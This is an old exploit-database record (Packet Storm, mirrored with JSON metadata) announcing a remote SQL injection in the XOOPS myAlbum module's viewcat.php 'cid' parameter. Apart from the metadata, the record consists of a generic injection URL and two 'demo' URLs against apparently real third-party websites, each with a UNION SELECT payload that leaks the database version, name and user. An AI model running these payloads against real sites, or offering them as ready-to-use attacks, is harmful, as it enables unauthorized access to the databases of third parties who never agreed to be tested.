ID PACKETSTORM:70897
Type packetstorm
Reporter r45c4l
Modified 2008-10-14T00:00:00
Description
`[~] XOOPS 1.0 RC 3.0.4 Module myAlbum - Remote SQL Injection
[~]
[~] www.xoops.org
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~]
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/modules/myalbum/viewcat.php?cid=SQL
[~]
[~] Demo :-
[~]
[~]
[~] http://amigaworld.net/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*
[~] http://www.canelupocecoslovacco.info/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*
[~]----------------------------------------------------------------------------------------------------------------------
`
{"sourceHref": "https://packetstormsecurity.com/files/download/70897/xhresim-sql.txt", "sourceData": "`[~] XOOPS 1.0 RC 3.0.4 Module myAlbum - Remote SQL Injection \n[~] \n[~] www.xoops.org \n[~] ---------------------------------------------------------- \n[~] Bug founded by d3v1l \n[~] \n[~] Date: 20.09.2007 \n[~] \n[~] \n[~] d3v1l@spoofer.com \n[~] \n[~] ----------------------------------------------------------- \n[~] Greetz tO:- \n[~] \n[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) \n[~] \n[~] \n[~]------------------------------------------------------------- \n[~] Exploit :- \n[~] \n[~] http://site.com/modules/myalbum/viewcat.php?cid=SQL \n[~] \n[~] Demo :- \n[~] \n[~] \n[~] http://amigaworld.net/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/* \n[~] http://www.canelupocecoslovacco.info/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/* \n[~]---------------------------------------------------------------------------------------------------------------------- \n`\n", "edition": 1, "references": [], "modified": "2008-10-14T00:00:00", "hash": "78d892db8a26c64dd95f1025c888911a42c8f9dfeea51bbbaaf9e4a56f60a933", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/70897/xhresim-sql.txt.html", "description": "", "id": "PACKETSTORM:70897", "reporter": "r45c4l", "lastseen": "2016-11-03T10:15:52", "published": "2008-10-14T00:00:00", "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "xhresim-sql.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "98a5aee2fde52accdc94346298f56ea6", "key": "href"}, {"hash": "622ede5d0a65f30144378167f6f0d29f", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "622ede5d0a65f30144378167f6f0d29f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8670932743617996ee2b7372a85626bf", "key": "reporter"}, {"hash": "6fbdd9e05293bcd882bd831c2078f764", "key": "sourceData"}, {"hash": "9e5a8e7fee7cafc9c1a285c47a2881b2", "key": "sourceHref"}, {"hash": "dc464da2b7cc3f12c1ed5b8bcc7ae65d", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{"result": {}}